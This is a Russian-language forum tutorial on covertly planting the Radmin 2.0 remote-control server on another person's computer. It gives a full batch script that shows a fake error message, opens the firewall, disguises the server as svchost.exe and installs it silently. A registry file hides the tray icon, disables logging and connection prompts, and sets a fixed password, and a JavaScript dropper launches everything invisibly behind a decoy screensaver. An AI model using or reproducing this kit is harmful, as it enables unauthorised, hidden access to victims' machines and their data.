Удалённое управление RADMIN

[dum_forever]

Удалённое управление RADMIN 2.0


Сдесь я расскажу для новичков как можно зайти через радмина на компьютер юзера, для этого нам понадобится компилировать файлы, скрипты, ниже я привёл код который нам прийдётся выполнять.И так приступим.)

Все операции приведны для 2.0 сервера.

Скрытая Установка


Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола
Скрываем Радмина в трее
Между прочим, если просто стартануть сервак без всякой установки, он заработает.Вход не потребует пароля для подключения к удалённому компьютеру.
Однако, тут же палит себя в трее. Чтобы этого не случилось, необходимо прописаться в реестре.
Для этого создаём текстовый документ со следующим содержимым, расшеренее .REG , сохраняем

Код:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - путь к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзера разрешение на подключения к компьютеру

Сам же сервер автогрузиться как служба.
Настройки скриптов.


Главные компоненты радмина это:
AdmDll.dll и raddrv.dll.
И назвать его можно как угодно, главное чтобы не палилися в диспетчере задач. Переименуем r_server.exe в svchost.exe

Параметры автозагрузки радмина

regedit.bat - автозапуск всего.
Затем извлекаються все записи из реестра в regedit.reg про Радмин, если он был уже установлен.
Происходит автокопирование в системную папку(например, C:\Windows\).
Установки радмина обновляються на ваши(два варианта под 2000 и ХР)

Установка и запуск сервера.

Код:
@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start
Создание записей реестра regedit.reg


Здесь в параметрах защиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]

Содержимое regedit.reg


Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,9 2,11,f4,ce, 1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5, 89,e4, b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28

Можно невидимо пустить bat-файл через ява-скрипт:bat.js

Содержимое BAT.JS


Код:
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);
-------------------
Для подключения к удалённому компьютеру потребуется радмин версия 2.0, PORT 4899, указваем айпи юзера на которыйй коннектимся.)